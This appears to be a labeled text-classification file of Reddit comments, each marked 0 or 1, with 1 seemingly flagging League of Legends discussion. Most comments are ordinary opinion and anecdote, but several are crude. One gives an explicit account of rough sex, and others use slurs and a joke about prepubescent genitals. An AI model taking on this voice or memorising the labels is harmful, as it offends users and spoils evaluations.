0	Don't worry mate, a good life isn't determined by how much money you earn, it's about what you chose to do with your time on this planet. Just think about what you want to do, then do it.   You want to go travelling? Get a ticket and go, you can work once you're there, it's really that easy. The amount you experience while you travel is huge, more valuable than any degree could ever be.   You want a career? Just start at the bottom wrung of the ladder and work your way up! Most companies are more concerned with relevant experience than education/qualifications.   You want to learn something? Pick up a book and get reading! You don't have to get a degree to learn whatever it is you want to learn. Just learn whatever you want, whenever you want, eventually, you'll have built a broad range of knowledge, so if you ever wanted to go back to college, it wouldn't be so hard for you.
0	When I was in the position OP was, my boss came over and just straight up told me that they weren't going to give me a raise.  I don't mind you not addressing it if I haven't, but it's insulting as fuck to have someone tell you they fired the other IT guy who made more money than me, weren't hiring anyone else to fill his position, AND they weren't going to pay me more.   I told him that I'd do the same quality job I'd been doing to the best of my ability, but if I couldn't get to something at one of our 14 offices that day, it would have to wait until the next.   I worked in a Real Estate related field, and all of the branch managers were women, whose branch was more important than every other office.  It was funny when they'd call and try to get mad at me because I hadn't made it to their office yet, and I'd just forward them to my boss.  Let him tell them their office is #10 of 14, and that there's something wrong at the #2 office that's more important.  He'd just fucking lie to them though, but I didn't have to.  When the distance between the two farthest apart offices is 60 miles, it can take me a while to get to you.   After I left (albeit unrelated to the above), they moved the servers to a corporate office so the local IT team didn't have to do anything with them, and my replacement made more than me with less experience, and they let the fucker work from home.  I miss the money and mostly easy job, but I don't miss that BS.  I hated politics, and since I was the IT manager, I had to play the game sometimes.  I sucked at it because everyone else had been there 20 years+ and even when it came to IT decisions, they asked my boss who had to call me to ask how to log people out of the Citrix Management Console FFS.
0	During my senior year of High School me and some friends decided that it would be fun to explore DC (we lived near there on the Virginia side), and one of the places we went was the Library of Congress. I got a card and immediately requested Playboy Redheads. I was rejected, and sad. So i found out how to get porn and was told I needed a letter from a teacher saying that the request was for scholarly purposes. Two weeks later, and through some half truths I had my English teacher sign off on a paper that allowed me to track the progression of the concept of beauty and how it was determined by the images sold to us. I went back to the library of congress filled out request form, and was promptly given my glorious book. Nothing is better then walking over to pick up your playboy, while the history major library attendants look to see which perv ordered playboy.
0	Exactly, the thing is insulting/shaming someone because of a problem just isn't what you do(at least not what I think to be right). Of course you shouldn't aspire to be fat and it should be highlighted as a negative, but rather than making someone like crap you should try encouraging them to lose weight, the same way you would encourage an alcoholic to go to AA or a drug addict to go to rehab or something? Everyone has problems and giving them shit for it will just make it worse. But some discouraging/limits are necessary smoking is taxed incredibly highly compared to shitty food and and everyone's image of a drug addict is the same so why not overweight people too?
0	It's north of the Wall.   No, seriously. Some people have been saying it's El Nino; These people are wrong. We are actually experiencing a moderate La Nina year, which usually means a colder, wetter winter for North America. La Nina is producing shitty winter weather and using an atmospheric bridge to deposit it up north. However, unlike the past few years, we are experiencing a positive Arctic Oscillation. This means there's a wall of high pressure south of the Arctic Circle, accompanied by lower pressures in the Arctic. Winter isn't being pushed south very hard, and the southern weather is pushing up against cold, snowy weather harder than usual. So, winter is hanging out up north fucking over Alaska and the Canadian territories. Unfortunately, the Arctic Oscillation is fairly unpredictable, so we could get a sudden onslaught of winter at any time.
1	I will be blunt, this is bullshit Riot.   No, your opinion is bullshit. Just because you were in the wrong place at the wrong time does not mean its Riot's fault.   >If this patch is really this bad then oh I don't know don't release it,   How would they know if it was bad? Internal testing only can go so far. They don't have a magic screen that tells them "Hey bros, this patch is cool, send it off". No, they test as much as they can, release it into the wild, get feedback from the community, and fix it there.   >I would rather you just redo the patch from ground up   Are you fucking kidding me. Redoing a patch from the ground up is a pointless waste of time. Tell me, if there's a small hole in your wall, do you tear it down and build a new wall? No, you fucking fix that spot where the hole is.   >because it is obvious you don't know what the problem is   And I'm sure you do. Riot, you should hire brossef, he's the only one of us that knows how to perfectly release patches with no bugs or server downtime. And he obviously knows how to cure cancer and make toast land butter-side up, too. Quit being an ass.
1	I disagree about the Summoner Spells. there is less poke and more fights on PG than on SR, because the distance between the towers is longer, so you have more room to fight. Therefore spells like exhaust are great as well. Heal sucks, because people always stack it instead of waiting, high CD and the 20% heal reduction.   Ignite is ok as well, even a must have vs ap yi etc.
0	I used to volunteer at a suicide hotline. I talked to lots of people going through various degrees of trouble. About a dozen or 2 within a 4 hour window. Something a lot of people don't realize is that these hot lines are not just for those contemplating suicide. Most of the time the people calling were just looking for someone to relate to and/or bounce ideas off of. The biggest reason why people call is because they feel lost at the moment and need to talk to someone who will just shut up and listen. Usually when a person in general talks to their friends or someone they know about an issue they are having, that person will start to give them advice or turn that conversation into a conversation about themselves. At suicide hotlines, the people working the phones are trained to listen and empathize vs giving advice.   I personally make it a point to tell my friends and acquaintances who are going through a tough time, that if they ever want to talk to someone anonymously they should consider calling the hotline. It is a fantastic resource. A little known fact, the hotline will always ring at the facility closest to your location based on your area code. Also, the facility will most likely also cover CPS (child protective services after hours),  APS (adult protective services after hours) and 211 (health and human services hotline). Because of this, the suicide hotline will have phone numbers for resources in your area that may be able to help I.e. food pantries, low cost therapists, free tax services, handicapped transport, etc. Something even more awesome is that you can access the suicide hotline online chat room if you don't want to talk to someone on the phone. Finally, if you know someone who is thinking about suicide but they won't call, you can call yourself and get a quick training as to how to approach your friend/family member.   Anyone going through a tough time or know someone who is should consider calling the hotline. This is a legitimate resource that is highly under utilized.  Something to remember is that you will not be judged or "get in trouble" for calling as long as you legitimately need someone to talk to.
0	Doesn't sound so bad when you put it that way, but let's take a closer look at the best friend.   •How many girlfriends has he had? •How has he treated them? •Does he have a history of infidelity? •Does he have diseases? •Has he been divorced? •Does he have a kid?  •Does he talk openly about his sexual  conquests? •How many women has he fucked? •Has he paid for sex? •Can he afford a family? •Does he have a history of chemical  dependence? •Does he have a history of mental or  emotional instability?   Do any of these criteria disqualify him from being your best friend? Nope, not really. Personally, mine's got over 100 notches on his bedpost. Right on bro! We've gotten wasted together more times than I can count. We've bragged about slams, and about notable feats. We've consulted each other on the most tactful ways to break off a relationship. I was the first person he told when he got his last girlfriend pregnant. I was the fist person he visited on a road trip with his fiancé and beautiful baby girl. I was the first person he talked to when he found out his fiancé was cheating. He took his ring back, they split custody. He explored backpages, filled me in on how it works. He saw other people and made new friends to get drunk with. He called when he got a promotion. He bought a house. He came to visit again, no kid, no fiancé. We threw a party, he snuck off with my little sister and took her virginity. They began a long distance relationship. She went to visit and found he had been seeing other women. He was my best friend for 11 years.
0	Backstory:  My mom is like a walking fountain of youth. She looks exactly the same right now as she did 20 years ago. One secret to her youth is applying inhumane amounts of creams and lotion to her face every night to deal with wrinkles. Another secret is defeating pimples before they become a problem. Although it is not "scientifically supported," toothpaste  does  contain a few ingredients known to dry out pimples. I made fun of her for many years until I gave it a try myself and have to say I do like the results.
0	No, what I said was I was  unable  to read the sources because either the links don't work or I have to pay/subscribe to read the articles so I can't verify the article.  I'm not a big fan or freakanomics because their book used questionable statistics interpretations, but then again it didn't go into great detail either; mostly it slapped some statistics around and called in economics, which I studied so I didn't enjoy that and so I'm not willing to take their word for it.  Also, perhaps you should look up the definition of  paranoid .  As I pointed out many girls are paranoid as I probably am as well.   par·a·noi·a    [par-uh-noi-uh] Show IPA noun 1. Psychiatry . a mental disorder characterized by systematized delusions and the projection of personal conflicts, which are ascribed to the supposed hostility of others, sometimes progressing to disturbances of consciousness and aggressive acts believed to be performed in self-defense or as a mission.  2. baseless or excessive suspicion of the motives of others.   Seems to me the use of this word made it pretty obvious I didn't think there was some mass roofies conspiracy.  I know quite well that the article is most likely correct even if I won't believe it blindly because all studies have flaws and I like to make an educated opinion.  My mention of roofies was merely to demonstrate that women are hyper sensitive to the possibility of being raped or their friends being raped, but I see now it muddied the waters because they feel that way regardless or drugs are involved or their friend is just extremely drunk because diminished capacity is diminished capacity.   My criticisms were based on the article since I couldn't read the sources and are actually questions I'd have of any study since they would be hard things to control for, that isn't to say they didn't, just that I can't read them to see how possibly could.  The biggest to me would be the under-reporting; Many women if they were drinking won't report.   Here .   EDIT to add:
0	I didn't take it as an insult, that's why I tried mocking it further unsucccessfully. I thought I upvoted you too but I clicked the downvote apparently by accident. Whoops!
0	Max speed has nothing to do with it. It's about bandwidth.  The lines to your house, even if they are coaxial cable, can support a lot more bandwidth than you're probably getting.  Reason why is because the cable company is governing your throughput in an effort to make more money.   For instance, Google Fiber is offering 1000Mbps symmetric (same upload and download bandwidth).  Verizon FiOS offers significantly less for double the price, and that's asymmetric.  Both services provide fiber straight to your house, so it's not the media over which your data travels.  So what is the difference?   Only difference is the company.  One is going to impose a limit more in line with other providers. Why do ISPs limit our bandwidth? Because bandwidth caps (and in some places, data caps) will cause you to want to upgrade your service.   The reason residential lines are asymmetric (lots of download bandwidth but not so much upload) is because the "typical" home user requires such. Every time you visit a web page, you tell the server what resource you want, whether it be a web page, a picture, a web page with pictures, music, video, etc. You send a packet or two and then you get back a flood of packets.   Businesses and servers work the opposite way.  Depending on your business model, you will typically use the same or more upload bandwidth.  So, if you want to host a server and have speeds that don't suck, you need to upgrade to a business package. This means more money for the ISP.   If you want to upgrade your speeds, they will not come to your house and rollout some magical new media that will instantly increase your speeds a hundred-fold.  If they did, they would charge you an insane amount of money.  Unless you are a business, then they might run additional lines (think more lanes on a road).   Problem is, where does the greed end? We have become a society that can't live without the Internet. As such, we will pay whatever it costs for connectivity. Some places, certain ISPs have regional monopolies and can charge whatever they want for whatever bandwidth/data restrictions they want. Until another company moves in a provides a reasonable alternative, we will have to suck it up or do without.
1	20 min. × 20  = 400 min + 20 × 10 = 600 min. = 10 fucking hours.   No offense but this is stupid, you don't need to play fking  10 hours of custom games to learn how to play. 10 hours is a shit ton of time. Better play a few hours of normal and you are done. 10 Hours, I have a real life too :P   Other than that those tips are good ;)
0	Lazy" is one of the most unhelpful of human concepts. No one is lazy. Motivation can be reduced by two factors: desire for an outcome and the belief you can achieve that outcome.   If you have an outcome you desire but don't act on it, then either you don't really want it, you don't really believe you can achieve it, or you are consumed by a more pressing need. Rationally you might be able to believe you can do the thing and you really want it, but humans are far from purely rational. Or perhaps we are purely rational in the sense that we believe what we've experienced over what we've been told.
0	so it went from .015% to .018%. Still not a very high number. Just saying. That means 99.982% of people will live. Not to say it's not dangerous though, like you mentioned before about complications afterwards and stuff like that, it's just not all lethal.
1	tbh, i always felt like it's not western teams are better / worst than korean one, it's just that the korean plays a move ahead.   During last years worlds or paris allstar, korean were ahead, yes, but during teamfight or global fight, the trade never were that unbalanced. If it was, it was mainly due to the gold advantage they built up and /or the rotation surprising western teams.   Imo we can observe this because korean team does not play with few patch ahead, but they got analyst that gives them better readings of the game they're currently playing. All those little overall details (xp/gold passiv/from minions, items/champs nerfs/buffs => new meta resulting, and so on...).   So koreans got a better understanding as a team on the game. And western team do not try more than acting like them, sometimes they do well (sk end spring season - mid summer season, with the rotations and map ressources), but do not react the same when the overall plans goes wrong.   The best korean teams knows all whereabouts of the meta, since they made it up. So they play it easier, they know its ups and downs.   But when the novelty come from western worlds, korean feels like being a little lost, not because they are bad with, but because "we" are already used to it, to its limits. Like morg supp, mao toplane, and we might think of anything else.   To me, to beat korean we do not need to play "better" than them, because there is not only 1 way to play this game. We need to build up diversity picks /strats that gonna make them play a game they're not familiar with.
0	Oh man, there was this kid we called "Joggers" that was one of my best buds circa 1990-94.   His mum was well cool (and looking back, really hot, but this was just before puberty so I didn't really notice that then).   This kid was obsessed with war films, and horror films, and because his mum was cool, she let him watch whatever he wanted. So by association, so did we. We played "Tremors" (obviously a new film at the time and just out on VHS) in the playground for ages.   One day we go a youth club in one of the villages (I grew up in rural England) for a disco and his mum is picking us up. He leans in through the car window and screams right in her face, "YO, MUM! WE NEED MEDEVAC NOW!" and leaps in the back door in a heap.   We sheepishly get in behind him, Jibbers in the front seat and me (known as Big Manny) next to Joggers.   Joggers makes his hand into a gun and PRESSES IT HARD into the back of his mum's head and starts screaming, "DRIVE! OR I'LL BLOW YOUR BRAINS OUT!"   And his mum (and me and Jibbers) are kinda embarrassed and she's like "Please don't do that Johnathan..."   And he's going "DRIVE! YOU DIRTY BITCH! JUST DRIVE!" at which point my face is all crinkled up like hedgehog or a crisp packet and Jogger's mum's all like "Please don't speak to your mother like that, Johnathan" and now he's POKING HER in the BACK OF HIS HEAD with his FINGER GUN yelling "JUST DRIVE! OR I'LL KILL YOU!"   So she does and then me Jibbers and Joggers just sat there like normal 9 year olds all the way home, Joggers seemed satisfied, and I can't speak for Jibbers but deep inside me there was a burning embarrassed flame that never left when I saw Mrs H ever again.   I saw Joggers years later. I was sitting in a car outside my house with a friend of mine who'd dropped me off after a lift (see the similarity of the situation?). It's after midnight and Joggers comes running down the road windmilling his arms, screaming "WE ALL GOTTA GET TO THE GYMNASIUM! MANNY! MANNY! WE GOTTA GET TO THE GYMNASIUM!" and then runs off cackling into the velvet night.
1	Had a similar situation not too long ago. I would say to just cooperate with them and answer their questions to the best of your ability. From my experience, the support staff wants you to have your account back. I had to answer the same questions (First 5 champions, account creation, etc.) I also found it challenging to remember the first 5 champions. Hell, I didn't even list 5. If they say that they need more info just give it to them to the best of your knowledge. I didn't even give the correct email I first signed up with. But in the end, they gave me a hint towards the email I used to register and I was able to match it. After that, they gave me my account back. The process took about ~2 weeks.
1	I think they handled it poorly. I don't remember who said it, but 80% of the people who lost their runes got them back shortly after the servers came back up. Yet, these people still got the RP. It would seem unfair to the majority, because those 80% couldn't have possibly been playing, anyway.   Now, had they credited the 20% that didn't have their runes back immediately, I'm sure there would be much less of an uproar (give or take the few that cry regardless of what Riot does).   I don't care either way (obviously I want free RP but I'm not going to ragequit/ragepost/kill babies over it).   Also, Pendragon may have trolled a little bit too hard.
0	You throw a newspaper away.  Newspapers tend to not have porn.  Laptops have crevices that collect filth and are rarely cleaned.  Laptops are electronic in a potentially humid environment.  Laptop rests on your lap while newspaper tends to be held up over it.
0	Solution: Stop being a nice guy.   I was well brought up. I have a great relationship with my mother. I'm friends with a lot of my exes. I'm polite and respectful, and a lot of that pickup artist 'negging' bullshit really makes me sick. I'm nothing if not well mannered and at least relatively thoughtful.   But when you ask me to describe myself in terms of characteristics a woman would find attractive, 'nice' doesn't even register. I'd talk about how I'm funny, or how I make eye contact when I talk, or how I speak to girls on dates the way I speak to my friends rather than the way I speak to a stranger I'm trying to fuck. I'd talk about how I have a cool job in a creative industry that I'm proud of, and how I'm actively pursuing my goals on a daily basis.   Not that I'm nice. Jesus fucking Christ, if the most interesting thing about you is the fact that you're fucking  nice  no wonder women aren't interested! I guarantee you there's something more marketable about you than the fact that you say 'please' and 'thank you' and hold doors open.   Forgive me if I borrow a page from Chris Rock, but why the fuck do 'nice guys' expect to be rewarded for  shit they're supposed to do !?   Oh, you don't treat others like absolute shit? Great, you're doing the thing that HUMAN SOCIETY EXPECTS YOU TO DO. Making yourself out to be some kind of martyr because you don't behave like garbage is like me whining that nobody rewards me for driving on the right-hand side of the road instead of crossing the yellow line and careening into traffic.   Women don't go out with shitty guys because they're shitty,  they go out with shitty guys because they're exciting and interesting . Guys who seem cold or distant or are inconsistent with their affections are more interesting than a guy who simply worships the ground they walk on. Ask yourself - if you met a girl who defined herself solely by the fact that she was nice and spent the bulk of every interaction avoiding any actions, jokes, or conversation topics that might be offensive or upset your delicate sensibilities, how much time would you want to spend around her?   You don't have to be an asshole to get a woman to like you. You just have to be  interesting . If you're fun to be around - not just  safe  to be around - you're bound to have more luck. You don't have to be an asshole. You can be completely polite and respectful while still putting forth a persona that others - women, men, or whoever - find interesting and want to spend more time around.   Maybe I misspoke. Don't  stop  being nice. Keep being nice. Just stop  defining  yourself by your niceness.
1	It's not just black cleaver, many ap items were made cheaper but less effective, making ap less strong in the late game, athenes lost 30 ap, dfg was made weaker for most champs, and a lot of people have higher mr than before in the late game, as a result of Aegis's upgrade, Runic Bulwark.   I genuinely don't hate on riot and it's pre season for a reason, it's alright tbh, but I do think it will be harder to make ap carry work late game with the new changes.
0	So, there seems to be some ladies on here who are having troubles with BC in pill form.   I took BC pills (Yaz, and then generic) from 2007-spring of 2011 to regulate my periods. I did gain weight (partly because of college), and I didn't have any mental side effects until about 2010, when I started crying weekly, and then daily, at almost no provocation whatsoever - When I finally ended up yelling at my friends on Spring Break for a completely crazy reason, I threw the pills in the trash and stopped BC for a year.   That being said - after I got off of BC, my skin slowly started flaring up EVERYWHERE - pretty terrible, although my mood was greatly improved. But, no more normal periods again :( So I looked for an alternative option - NuvaRing. I've been on that stuff for about 6 months now, and it's fantastic. You just stick it in and forget about it for three weeks! I'm not crazy anymore, my skin is going back to what it once was, and I'm able to lose weight again.
0	I was having a weekend fling with a girl a few years back. I was in town for a party for a website we are both members of and this girl is absolutely amazing. Tall, gorgeous, great personality, nice... but she was hiding a secret I didn't know about. She's an absolute freak in the bed. To the point that I didn't exactly know how to react. I'm 6'4", 265 lbs and she's not a "small" girl, probably about 5'10", 160 lbs. She wanted me to slap her around, choke her, talk dirty to her, etc. Our first night together was a learning experience for me. I was still holding back because I didn't want to hurt her or I didn't want to end up in an accidental domestic violence situation.   The next night we went out again and were invited to a private party the following night at a sex club by a couple we ran into. This really tripped the fantasy switch in her head, so later that night back at the hotel room the "HIT ME HARDER YOU PUSSY" lines really started flying. It was getting really rough and I'm standing behind her with her head buried into the bed when she tells me she wants me to fuck her in the ass. She was wet as hell and when I went to put it in, it slipped in a little too easily. This should have been a warning, but I went with it and continued to slap her around, talk dirty to her, have her screaming at me and me screaming back... we both REALLY got into it. This went on for about an hour until I realized what was going on. Things were just a little too wet. I hit the lamp and the shock hit me... Aunt flow had come for a visit in the middle of all of this. The room looked like a murder scene... BLOOD EVERYWHERE.   We both jump into the shower, laughing our asses off at the situation and now she's completely bummed out because she can't go to the party at the sex club. I called down for another set of sheets and some more towels and just chunked the dirty ones into the corner. We get some sleep and she runs home to finish getting cleaned up, changed, etc and get ready for the day whereas I go get brunch with friends and hang out for a while before heading back to the hotel.   I was in the shower when the knock on the door came. I thought it was the girl or some of my other friends that knew which room I was in so I wrapped a towel around me and answered the door. It was about 12 cops with guns drawn and they came through the door, then threw me on the ground screaming "WHERE IS THE GIRL?"   To make a long story short, the cleaning lady found the bloody sheets (and bloody everything else in the room) and told the front desk. The front desk had some complaints about a man and a woman screaming at each other the night before in the room. There was only myself registered to the room, I had been seen coming into the room with a woman the night before, but I was seen leaving alone in the morning. The hotel employees put 2 and 2 together and said that they thought I had murdered (or at least hurt badly) someone in the room. I get the girl on the phone and she hurries back to the hotel to explain what really happened.   This is why I'm scared of getting rough in bed with women.
1	That quote from Guardsman Bob is particularly interesting to me. There's a guy I know who plays DotA2 and keeps bringing up how LoL's teamfights last for ages as a criticism - like, yeah, do you not want the most intensive and engaging part of a game to last longer?   Just a note about Cinderhulk being OP atm - I think it's good for some new things to be OP at release as it encourages people to use and learn them. Now, as Cinderhulk gets trimmed back, people are going to start slowly moving away from tanks but will still be remember and be aware of the strengths of tanks.
1	I love how there used to be this huge debacle over twitch vs own3d which is better when like in a year it's absolutely obvious which one is better and adds more features on a constant basis. Own3d chat doesn't even work half the time, those dumb people who kept siding with own3d I never understood because the community could clearly see which website was releasing more features. Anyone stroll have trouble scrubbing through own3d VODs? Oh yeah, everyone does. Jesus they've been around for so long and they still haven't fixed basic things (only 1 even has a smartphone app right now, I know you can stream from the website of own3d but come on! It's impossible to navigate on such a small screen!!)
1	GUYS I DON'T WIN EVERY SINGLE GAME,
1	And she would've got away with it, too! If not for you meddling kids!   In all seriousness, there were many many threads on this leading up to and following Yasuo's release. Here is a summary of actual 100% revealed  facts  that we have been given:   Yasuo uses wind techniques. This leads to him being accused.   Yasuo was stationed to guard the elder, but left in his eagerness to join the battle. No living person, at least none who will admit it,  actually witnessed the murder .   The elder was killed by a wind technique with "three precise strikes," I believe the wording was. This is reminiscent of the technique that Yasuo was the first in generations to master. All the signs that are available to follow do point to him.   There are currently 3 champions who directly interact with wind, unless I'm forgetting someone: Yasuo, Riven, and Janna. Janna's the popular joke. Yasuo was exiled because he was accused for it. Riven was formerly Noxian military. This makes her a prime suspect for us.   However, another fact we have been presented is specifically  we do not actually know who did it . Until when/if they openly reveal it,  that's the entire point . It's exactly like the Vi/Jinx thing. They  do  both have sisters, this is explicitly stated. What isn't stated is  that they are sisters .
0	Not quite.   Imagine that you are a young kid.  Another kid comes up to you and says "My mom is going to buy this delicious candy that has peanut butter inside of chocolate, and told me to find out who want some.  Would you like some?"   You respond "Peanut butter inside of chocolate?  There is no such thing.  Don't count me in."   Well, later, that kids mom comes over with a bunch of Reese's Peanut Butter Cups, and you see this incredible thing.  The only problem is that you didn't want to be counted in the group, so there is none for you to have.  You must sit there and watch as all these other kids eat the delicious peanut butter cup.
1	I don't want to sound like a douche but the main thing that an adc (well a good one) will focus is farming and i thing that a good support is the one that should adapt himself to the situation and try to share it. Usually the support will manage to get the farm since relic is an execute. I understand the frustration of a support if the adc always manage to get the last hit while you have the relic stacks but how many times did i lose a farm simply because i tried to let the thresh get the last hit( and it's even more annoying if it's the canon).
1	Even if he only responded to people who flamed him and his bann (not the content bann) was unjustified -> doesn't matter. By creating an account, you express your accept to the supremacy of mods and admins. If they tell you to stop, you stop or you argue with them privately (there are several ways to do this, and as a well-known user, there is no chance that they won't listen to you). If you don't manage to convince them, you just accept the unfairness of the mod team and stay away from the forum.   One could argue, that r/lol is that big and important, that it is basically a part of the general lol-infrastructure, meaning the mod/admin team has the responsibility to make sure, r/lol is accessable to use for making business. In this case: RL fucked up even harder, or could you imagine a case in which walmart ,,bans'' (holy shit, my english sucks) a person who gets involved in trouble everytime he walks into a store and then goes to court to bring the store management to fall?
1	As nunu jungle my last game yesterday I ran into their jungle at level 1 and got 5 man ganked because I was typing to my team. They said "this nunu too good" in all chat and made fun of me for the first 4 minutes. I then ganked three lanes in a row successfully, later reversed a snowball when my zyra mid fed a brand to 5/0 before 10 minutes, shut down the yorick toplane, and counterganked the enemy shen jungle twice which resulted in a kill with 0 deaths to my team both times. I ended the game something like 6/6/14 or something and my team had the mentality that I was going to be horrible because I made 1 mistake and got caught. I was checking to see where shen would start when he blocked me off from his wraiths I assumed he'd start red and went to check blue and got caught. I fucked up but we still won hard and I helped my team immensely the whole game.
1	Doesn't matter if the sololane is bot or top , summoners rift is symetrical.   Other than that you make a good point.   Did you know beforehand you would have a jungler ?   Was this in a normal ?   Chances are higher u'll have 2 opponents in ur side-solo-lane. One does not simply go singed (or any other melee without range or get-out-skills like riven) in such a situation  ("FU i can only play singed" perhaps ?).
1	I wanna say that i came on to this subreddit with the intent to post something to this nature. I feel the hostility is overpowering. I also want to comment on something a little racey!!!! I really do hate when i am playing and a teammate doesn't talk the whole match, follow lane calls, or even when they steal farmed minions. (when you are fighting wolves and they come up and get the last shot on a small wolf)(i mean come on right)so they don't talk the whole match and then near the end after denying 3 surrenders (they are 0/11 by this point) they come in speaking spanish saying something uncomprehendable. Then when google translate comes into play ("I own this game, im the best") is what it translates. I think ok troll you dont speak english, you are playing a team game, and you have nothing to say about feeding or stealing minions except that you own this game and are the best? Sorry got off on a tangent.
1	I didnt watch the replay completely, i was skipping for 30 secs or so till the end to see how the game progressed so  I might be wrong but:     You should give kills to your teammates more. Now, i know it might sound crazy, but youre not going to carry 1v5. You just arent. Giving kills to your teammates will make the stronger and you will win as a team.     Dont build full tank eve when youre going fucking legendary. Get some damage and then you might see improvement. When you get 13 kills in a game you shouldnt really be going full tank, on 90% of the champions. The few exceptions are maybe Nunu, Nautilus, Sion and maybe top lane smite Shyvana. Other than that you should always get at least 1 or 2 damage items if youre this much up in gold. Those dont have to be Infinity Edges, you can buy Abyssal, Ryalis, Black Cleaver, etc.     Last one, the most important one. Try not to focus too much on others mistakes and try to play the game more calm. You werent even playing and I saw you were pretty salty. I can only imagine how it is when you play. Just try to relax a bit, if things dont work out for 2 or 3 games its alright, just go outside a bit, play some other game, do whatever. Pretty much
0	You will get over that. I am 23, never had an official GF, and am currently with an interested girl, though we are not in an official relationship yet. Our feelings are mutual, but we both agree this is not a good time for a relationship. We are both very busy college students, I am a student-teacher getting my license/degree, and she is studying nursing. We both want to commit when we both have the time that each other deserves to commit to each other.   Once in a while the thought of making an official commitment, especially with never having really done it before, scares me to death. What if someone else better is out there? I came to my sense a while back thanks to an article that I cannot remember the source osf at the moment. I am not aware of your religious persuasion, but I am a Christian, and an online article really did it for me.   The
1	I DUNNO GUYS BUT I'D JUST LIKE TO SAY that I've played over 1500 games of LoL and I haven't had a single leave.   GUIDE TO NOT LEAVING   Note: this is what I do.     Make sure you have TIME to play League of Legends   Make sure your INTERNET IS STABLE before playing League of Legends by doing a speedtest   Make sure your POWER IS STABLE before playing LoL, and there are no storms or such that would affect my connection   Make sure your COMPUTER WILL NOT CRASH by checking what programs you have open, as well as your processes    Make sure that there is no LOGIN QUEUE in the case that LoL crashes   Make sure that you are PHYSICALLY ABLE to play League of Legends without stopping for at least an hour and a half   Make sure that you have NO PRIOR ARRANGEMENTS in the next 1.5 hours     That means:   Stormy outside? Don't play.   Little brother fucking around with Youtube? Tell him to stop or don't play.   Dinner at 6 and it's 5? Don't eat or don't play.   Class in an hour? Don't play.   Share connection in a dorm and retards torrenting? Don't play until early morning when nobody is using the internet.   Computer overheats? Don't play until clean out computer or find out why it's overheating.   Call from friends/girlfriend/parents/grandparents? Don't pick up until you finish game, or wait to text/call them when you are respawning telling them you're really busy   Remember: You can't disconnect or leave from a game if you don't start a game. Possibility that you may have to leave a game? Don't play.   California V C Section 22350 Basic Speed Law: No person shall drive a vehicle upon a highway at a speed greater than is reasonable or prudent having due regard for weather, visibility, the traffic on, and the surface and width of, the highway, and in no event at a speed which endangers the safety of persons or property.
1	as a new palyers u should start asap with normal games... and yeah u will face some smurfs at the start but after some losses u face no longer smurfs... if u play until 20 u will face smurfs too and when u start than to face normal people (not smurfs) they are already better than u cause they didn´t played bots until 20...
1	I was in a normals game today that my team ended up winning (late game ryze/renekton vs. squishies gg wp).   We had a guy who chose Ezreal (you can see where this goes lol) and proceeded to start out 1-6 bot with Sona. Top lane gets turret down early, but Caitlyn has bloodthirster at 15 minutes. So needless to say Sona was a bit salty.   The kid apologizes and says it's his first time playing Ezreal. This is where I think things get tricky for me as a player, because although I am very polite and deferential and make conscious efforts to come across as such (seasoned by spending most of high school getting abused and abusing on people in Halo/CoD), I am nonetheless very competitive and want my record to reflect my ability. MOBA's are different than any other genre, I think, because it's not just a 5 or 10 minute splash like shooting games or even a half-hour slog like FIFA or Madden where you're the only person to blame. There's something very Tantalesque about a slightly inferior or even overmatched opponent slowly bleeding you to death because he's fed, not necessarily better. That can be maddening.   Personally I would  never  tell a person to kill themselves (which happened in this game from Zed and Sona, they were pretty brutal). But it's certainly frustrating, and given that my previous games (yoloQ obvs) featured a duo that  demanded  top and went 4-24 and a first time Aatrox that went 1-18 before that...I was noticeably annoyed to say the least.   It is one thing for a new player to have a bad game as Garen, or Tryndamere, or even  nope not Renekton because he drives a chevrolet movie theatre  Ashe; especially if you've been forced into a role you're not comfortable or accustomed to playing. But IIRC the kid called bot in pregame, asked who he should be (cycling between Mundo and another tanky champ), being told "not Ezreal unless main" and still choosing Ez. This isn't level 3, it's ~20, so even though it's normal I feel as if you should generally understand that if you get killed three times in a row it's either time to hug turret or switch lanes.   It's hard, man. I know when I flip on BlackOps II that I'm going to learn a lot about my mom's proclivities for prepubescent testicles. LoL shouldn't be like that, I feel as if we have a responsibility as a community to discourage and call out behavior like that, but there will always be those who invest a lot of emotion and lash out way more negatively than is necessary for any MOBA, just like there will always be those who invest a lot of emotion and take things far more seriously than should be warranted by a stranger on YoloQ on the internet in a game featuring humanoid arena fighters.   I remember mid not calling out MIA twice in a row a few games back; the third time i survived but I typed "mid come on you have to let us know MIA we're getting destroyed up here." I'd notified the first time, got a "sorry", the second time got a "my bad". It's frustrating, especially when your team is better overall.
0	It's not cut and dried. Sure, there are negative aspects to inner city culture, (not black culture - there are no homogenous racial cultures) and young black people are constantly bombarded with negative stereotypes and role models, but urban crime culture and gang culture are very closely related to economics, which find their root causes in historical racism. Latinos are another ethnic group who are in a big way affected by urban crime culture, and likewise have similar socioeconomic problems as a group.   If you grow up poor, if you grow up in the inner city, and if you grow up with a relative in jail, then you're in serious trouble from day one, regardless of race. That doesn't apply to all black people, but it applies to a disproportionately large percentage of them. While institutional racism doesn't have nearly as much impact now as it did fifty or one hundred years ago, its effects have lingered in the demographics of today. Poverty is self-perpetuating, and while many people, including many black people, have made it out of poverty, they are the exceptions, not the rule.   The fact that black people have not had equality under the law for nearly as long as most other American ethnic groups has retarded their economic advancement as a demographic. As time moves on, I anticipate that incomes and quality of life will trend upwards, and incarceration and drug use rates will trend downwards, and then the question of "African American culture" can be isolated. But at the moment the issue is too mired in the repercussions of institutional and legal racism to be studied objectively.
1	From Wikipedia:](   > In a non-legal context, spelling differs between countries. The spelling judgement (with e added) is common in the United Kingdom in a non-legal context.[6][7][8] In British English, the spelling judgment is correct when referring to a court's or judge's formal ruling, whereas the spelling judgement is used for other meanings.[9] The spelling judgment is also found in the Authorized King James Version of the Bible.[10] >  > In American English, judgment prevails in all contexts.[11] In Canada and Australia, in a non-legal context both forms are equally acceptable, although judgment is more common in Canada and judgement in Australia.[12] However, in a legal and theological context, judgment is the only correct form.[citation needed] In New Zealand the form judgement is the preferred spelling in dictionaries, newspapers and legislation, although the variant judgment can also be found in all three categories. Usage in South Africa is similar to that in Australia and New Zealand.
1	Tell him that he can watch all the pro player he wants, but until he gets into a rank higher than you, he cannot comment since he isn't even at that level. I hate these types of people the most. Just cause you watch something does not make you a god. If it was so good, why is he S4? I build kog with BotRK first and I carry. Ignore that idiotic roommate of yours and you best should not be friends with him. He will just make you play worse with all the negativity. Each player has their own play style and if it works for you and not others, good for you. I don't know why he expects you to play like all the pro players.
